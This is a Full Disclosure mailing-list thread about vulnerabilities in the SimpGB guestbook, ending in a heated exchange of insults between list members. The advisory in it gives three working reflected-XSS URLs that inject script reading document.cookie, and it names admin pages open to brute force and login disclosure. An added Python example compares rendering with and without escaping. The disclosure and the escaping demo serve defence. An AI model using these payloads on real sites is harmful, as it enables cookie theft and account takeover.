Full Disclosure mailing list archives

Re: Multiple vulnerabilities in SimpGB
From: "Cal Leeming [Simplicity Media Ltd]" <cal.leeming () simplicitymedialtd co uk>
Date: Mon, 7 Feb 2011 07:00:58 +0000

I think it's time for a group hug :|

On Sun, Feb 6, 2011 at 10:43 AM, Michele Orru <antisnatchor () gmail com> wrote:

 ahaah.
Nice reply Sparky.
MustLive, seems you've been defaced :-)

antisnatchor

 ------------------------------

   laurent gaffie <laurent.gaffie () gmail com>
February 5, 2011 3:36 AM

Hey Sparky,

One of the many, many things you didn't understand during the past 5 years is
that you should probably try to identify and fix your stuff on *your*
website, before spamming this ML with your crap.
cf:
http://www.zone-h.org/mirror/id/11367858

e-tard.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
------------------------------

   MustLive <mustlive () websecurity com ua>
February 4, 2011 10:49 PM

Hello Laurent!

You are a very "intelligent" man, as I see from this and your previous letter
(in 2010).

You need to take into account the next:

1. I know better where to send.

2. If you write shitty stuff, then it doesn't mean that others do the same.

3. No need to think and state instead of other people - if it's not
interesting for you, then it can be interesting for others.

4. The main and obvious thing is that I write all my advisories from 2006
for those people who are interested in them (and there are such people, as I
know for sure). So if you or anybody else is not interested in them, just
skip them (and don't need to write me nonsenses) - I'm writing my letters
not for you, but for others who are interested in them and who thank me for
my work. It's strange that such "intelligent" man as you didn't understand
it for last five years :-).

5. I don't need any not serious letters from you, so don't waste your time
writing me anymore, because I've put your e-mail into blacklist. Spend your
time for good things.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

 ------------------------------

   laurent gaffie <laurent.gaffie () gmail com>
January 26, 2011 4:09 PM

Send your shitty stuff to bugtraq () securityfocus com

If it's not obvious, no one gives a shit here, seriously.



------------------------------

   MustLive <mustlive () websecurity com ua>
January 26, 2011 3:15 PM

Hello list!

I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.

-------------------------
Affected products:
-------------------------

Vulnerable are SimpGB v1.49.02 and previous versions.

----------
Details:
----------

XSS (WASC-08):

POST request at page http://site/guestbook.php in parameters poster,
postingid and location in Preview function. If a captcha is used in the
guestbook, then a working captcha code is required for the attack. Or
via GET request:


http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview


http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview


http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force (WASC-11):

http://site/admin/index.php

Insufficient Anti-automation (WASC-21):

http://site/admin/pwlost.php

In this functionality there is no protection from automated requests
(captcha).

Abuse of Functionality (WASC-42):

http://site/admin/pwlost.php

In this functionality it's possible to retrieve logins.

------------
Timeline:
------------

2010.11.17 - announced at my site.
2010.11.19 - informed developers.
2011.01.25 - disclosed at my site.

I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/4690/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
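
The reflected XSS reported in the Preview function, modelled as an added example (not SimpGB code and not part of the original post): a constructed preview template is rendered with and without output encoding, using the advisory's three GET requests shortened to the relevant parameters. The template, the function names and the use of Python as a stand-in for the PHP application are assumptions; in PHP the equivalent encoding call is htmlspecialchars() with ENT_QUOTES.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Constructed preview markup (assumption: SimpGB's real template is not on the
# page). poster sits in element content; postingid and location sit in
# double-quoted attribute values, which is why two payloads start with ">.
TEMPLATE = ('<input type="hidden" name="postingid" value="{postingid}">'
            '<input type="text" name="location" value="{location}">'
            '<p class="poster">{poster}</p>')
FIELDS = ("poster", "postingid", "location")
PAYLOAD = "%3Cscript%3Ealert(document.cookie)%3C/script%3E"
BASE = "http://site/guestbook.php?mode=add&preview=preview"
# The advisory's three GET requests, shortened to the relevant parameters.
ADVISORY_URLS = [
    BASE + "&postingid=1&poster=" + PAYLOAD,
    BASE + "&postingid=%22%3E" + PAYLOAD + "&poster=1",
    BASE + "&postingid=1&poster=1&location=%22%3E" + PAYLOAD,
]

def request_fields(url):
    """URL-decode the query string and pick out the three reflected fields."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: query.get(name, [""])[0] for name in FIELDS}

def render_unsafe(fields):
    """Reflect the values as-is: the behaviour the advisory reports."""
    return TEMPLATE.format(**fields)

def render_safe(fields):
    """Encode & < > " ' so each value stays data in text and attributes."""
    return TEMPLATE.format(**{k: html.escape(v, quote=True)
                              for k, v in fields.items()})

class _ScriptFinder(HTMLParser):
    found = False
    def handle_starttag(self, tag, attrs):
        self.found = self.found or tag == "script"

def script_injected(markup):
    """True if an HTML parser sees a <script> element in the markup."""
    finder = _ScriptFinder()
    finder.feed(markup)
    finder.close()
    return finder.found

if __name__ == "__main__":
    for url in ADVISORY_URLS:
        f = request_fields(url)
        print(script_injected(render_unsafe(f)), script_injected(render_safe(f)))
```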


